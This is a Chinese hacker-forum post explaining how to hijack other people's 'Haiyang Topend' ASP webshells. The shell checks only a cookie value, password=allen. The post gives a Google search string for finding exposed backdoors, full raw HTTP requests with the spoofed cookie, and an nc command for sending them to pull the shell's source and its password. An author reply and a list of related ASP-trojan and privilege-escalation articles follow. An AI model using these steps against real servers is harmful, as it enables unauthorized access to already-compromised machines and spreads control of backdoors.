海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用
希望LCX别看到这篇文章,呵呵
最近海洋不知道怎么回事,不能上了,我就发在这里了。
我粗粗的看了一下代码,发现了一个问题,可以得到木马的密码,变成自己的木马。
思路是通过提交的COOKIE来查看木马的原代码,找出密码
看下面的代码
if trim(request.form("password"))="haiyangtop.126.com" then
response.cookies("password")="allen" 密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() 密码错误
response.end 停止运行
注意:response.cookies("password")="allen"
他没有要求SESSION认证,仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的,然后找到其密码。
还是实战一次:
1 找到一个后门,呵呵,不是我的,
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字,你也可以换成别的,注意一定要加引号,表示不拆分字符串查询。
这样就找到了许多,呵呵,我选了一个,路径是http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马是http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马,然后找到自己木马的路径,停!打开winsock expert选择监视对应的IE,然后回到IE点编辑,此时,IE显示出你的木马的原代码了,转到winsock expert 在前几行有一个用get 方法给你的木马的数据,我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer: http://202.202.202.202/pic/xp.asp?path=/pic&oldpath=&attrib=
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么?这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马是http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer: http://202.202.202.202/images/globla.asp?path=/images&oldpath=&attrib=
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了,保存在文本。
3 提交我们的数据
进入命令行,进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令,直接打开NC无法保存数据
呆会会提示连接成功,然后我门将作好的COOKIE粘贴在里面,然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码,
修改下面的haiyangtop.126.com改为你密码
if trim(request.form("password"))="23kodf@" then
哈哈,看到密码了,然后登陆吧,再改了密码,这个木马就是你的了。
俗话说了,黑窝更应该加强安全警戒,海洋顶端木马应用的范围很广,希望作者能尽快改进,添加session认证,使其更安全!
lcx:写的海阳顶端网的总是写得非常好呀。这个漏洞我很早就知道了,但利用方法没想到你做得这么巧妙!!精彩。2003版漏洞更大,上传根本不需要密码。
其实,原来写的时候,只是将别人的一些代码组织在一块儿,根本没有考虑密码的问题,只是做为一个后门。用了个密码,只是区分fso和非fso。
还要说明一点的是,我和allen不会对这个木马再做任何改动了。
整天将别人的源码组合来组合去,还要回答无穷无尽的关于菜鸟对这个asp木马的使用方法,谁还改呀~
海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用相关推荐
- 图片asp木马的制作方法[转]
一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马.一个网站里面除了asp文件,再就数图片 ...
- 仿58网,赶集网,百姓网swfupload图片上传效果(asp.net 2.0)
仿58网,赶集网,百姓网swfupload图片上传效果 (ASP.Net 2.0) 演示效果: 下载地址:仿58网,赶集网,百姓网swfupload图片上传效果 (ASP.Net 2.0) 后面会发布 ...
- 打造不死的asp木马
打造不死的asp木马 想不到,前几天我才发现,我千辛万苦收集的asp木马,居然没有几个不被Kill的.常说养马千日用马一时,可要是连马都养不好,用的时候可就头疼了.众多杀软中,查杀效果比较好厉害的就是 ...
- 关于ASP木马提升权限
来源: http://www.17nc.com/ 现在ASP木马是漫天飞,我有一次进去后发现竟然用30多个ASP木马,在帮管理员清理了后,真是累爬了.想想管理员还真是懒的可以-- 上传了ASP木马之后 ...
- 突破常规限制运行asp木马(转)
突破常规限制运行asp木马(转)[@more@] 脚本入侵中往往会上传一个asp木马来进一步扩大权限,或者在肉鸡中留一个asp后门也是一个不错的选择.但是如何让asp木马更加隐匿和强大,从而躲过网管查 ...
- aspx连接mysql木马_让你变成ASP木马高手_安全教程_脚本之家
1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为 找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 了运行成 ...
- IIS如何防ASP木马
IIS是Internet Information Server的简称.IIS作为当今流行的Web服务器之一,提供了强大的Internet和Intranet服务功能,然而在ASP木马程序泛滥的今天,如何 ...
- ASP木马提升权限的N种方法
ASP木马提升权限的N种方法 Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术 一.Serv-U提权 OK,看看他的PROGRAME里面 ...
- 教你利用思易ASP木马追捕入侵站点
朋友的网站近日多次被黑,而且老是被改页面,让我帮忙看看问题到底出在哪里.于是我找出早就听说可以找木马的思易ASP木马追捕,传到网站上查ASP木马.果然好用,它能列出网站内的所有目录和文件,凡ASP网页 ...
最新文章
- 2021 Facebook 博士奖研金名单出炉:13位华人学者获选
- SAP Spartacus lazy load module 里包含了被其他 Component 静态引用的组件该怎么办
- ssh(Spring+Spring mvc+hibernate)——DeptController.java
- Linux脚本(1)__批量下载
- java核心教程_核心Java教程
- 一篇文章掌握Egg.js的核心用法
- java实现小说采集_Java实现一个小说采集程序的简单实例
- RSA 加解密 1024 位 2048 位
- 基于python实现Maxwell软件的自动化仿真分析_1
- 全志F1C200S F1C100S 介绍
- 开学季Web渗透测试工程师精英班“第5期”来袭,加入即永久观看!
- IE Internet选项快捷键
- UE4使用OpenCV插件调用电脑摄像头
- mhdd4.6修复坏道图解教程
- HDU2121:Ice_cream’s world II (虚根+有向图最小生成树)
- 完美解决443端口被vmware占用的问题
- ZigBee组网机制以及数据的发送和接收
- 雨水弃流装置详细说明
- 《C Primer Plus》第五章 编程习题
- POI将excel表中信息读取,并且处理输出到一个新excel表中。